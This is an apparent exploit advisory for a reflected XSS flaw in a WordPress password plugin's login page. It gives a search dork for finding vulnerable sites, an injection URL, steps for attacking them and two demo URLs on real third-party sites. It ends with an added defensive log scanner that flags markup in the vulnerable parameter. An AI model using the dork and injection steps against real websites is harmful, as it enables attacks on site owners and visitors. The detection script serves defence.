Title: WordPress WP-Password Plugin XSS Vulnerability
Author: Arash Cyber
Date: 2/15/2014
Category: WebApp
Google Dork: inurl:"/wp-content/plugins/wp-password/login.php"
Tested On: Windows – Linux
Site: Attacker-Team.org

# Type: XSS Vulnerability
# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}
# Explanation: Paste the dork into Google, open one of the resulting sites, and delete everything after login.php in the URL.
Then append this to the end of the URL: ?err={Your Text} – and you are done 😀

Demo:
-http://fukushXimaboys.com/wp-content/plugins/wp-password/login.php?err=Your Text
-http://wakayXama-jc.net/2012/wp-content/plugins/wp-password/login.php?err=Your Text
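
Added example (not part of the original advisory): a log check a site owner can run to find requests that place markup in the err parameter of this plugin's login.php. The path and parameter name come from the advisory; the combined access-log format, the constructed sample lines and the list of suspicious tokens are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter name are taken from the advisory; the rest is assumed.
PLUGIN_PATH = "/wp-content/plugins/wp-password/login.php"
PARAM = "err"
# Assumed heuristic: tokens a plain error message should never contain.
SUSPICIOUS = re.compile(r"[<>\"']|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None (unrelated), 'benign' or 'suspicious' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith(PLUGIN_PATH):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(SUSPICIOUS.search(fully_decode(v)) for v in values):
        return "suspicious"
    return "benign"

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Feb/2014:10:00:01 +0000] "GET /wp-content/plugins/wp-password/login.php?err=Wrong+password HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Feb/2014:10:00:07 +0000] "GET /2012/wp-content/plugins/wp-password/login.php?err=%3Cb%3Ehello%3C%2Fb%3E HTTP/1.1" 200 530',
    '203.0.113.9 - - [15/Feb/2014:10:00:09 +0000] "GET /wp-content/plugins/wp-password/login.php?err=%253Cimg%253E HTTP/1.1" 200 530',
    '198.51.100.2 - - [15/Feb/2014:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

def scan(lines):
    return [classify(line) for line in lines]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(verdict, "|", line.split('"')[1])
```

A "suspicious" hit only shows that markup was sent to the parameter; whether it rendered depends on how the installed plugin version outputs the value.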